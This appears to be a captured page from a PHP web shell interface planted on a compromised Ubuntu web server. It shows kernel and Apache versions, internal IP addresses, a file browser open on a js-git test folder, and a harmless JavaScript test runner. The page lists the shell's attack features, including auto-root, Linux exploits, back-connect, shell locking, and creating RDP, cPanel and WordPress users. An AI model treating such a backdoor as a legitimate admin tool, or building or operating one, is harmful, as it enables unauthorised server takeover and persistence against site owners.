Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
js-git /
test /
[ HOME SHELL ]
Name
Size
Permission
Action
run.js
1.13
KB
-rw-rw-r--
sample-pack.js
1.95
KB
-rw-rw-r--
test-config-codec.js
1.6
KB
-rw-rw-r--
test-mem-db.js
1.65
KB
-rw-rw-r--
test-object-codec.js
6.94
KB
-rw-rw-r--
test-pack-codec.js
2.62
KB
-rw-rw-r--
test-pack-ops.js
1.17
KB
-rw-rw-r--
test-zlib.js
1.21
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : run.js
// Ultra simple test runner with TAP output. var inspect = require('util').inspect; var defer = require('../lib/defer.js'); var log = console.log; console.log = function () { var args = [].slice.call(arguments).map(function (arg) { return inspect(arg, {colors:true}); }); log(args.join(" ").split("\n").map(function (line) { return "# " + line; }).join("\n")); }; module.exports = function (tests) { var timeout; var test; var index = 0; log("1.." + (tests.length)); next(); function next(err) { if (timeout) clearTimeout(timeout); if (index) { if (err) { log(err.stack.split("\n").map(function (line) { return "# " + line; }).join("\n")); log("not ok " + index + " - " + test.name); } else { log("ok " + index + " - " + test.name); } } test = tests[index++]; if (!test) return; timeout = setTimeout(onTimeout, 1000); try { if (test.length) test(next); else test(); } catch (err) { return next(err); } if (!test.length) defer(next); } function onTimeout() { next(new Error("Test timeout")); } };
Close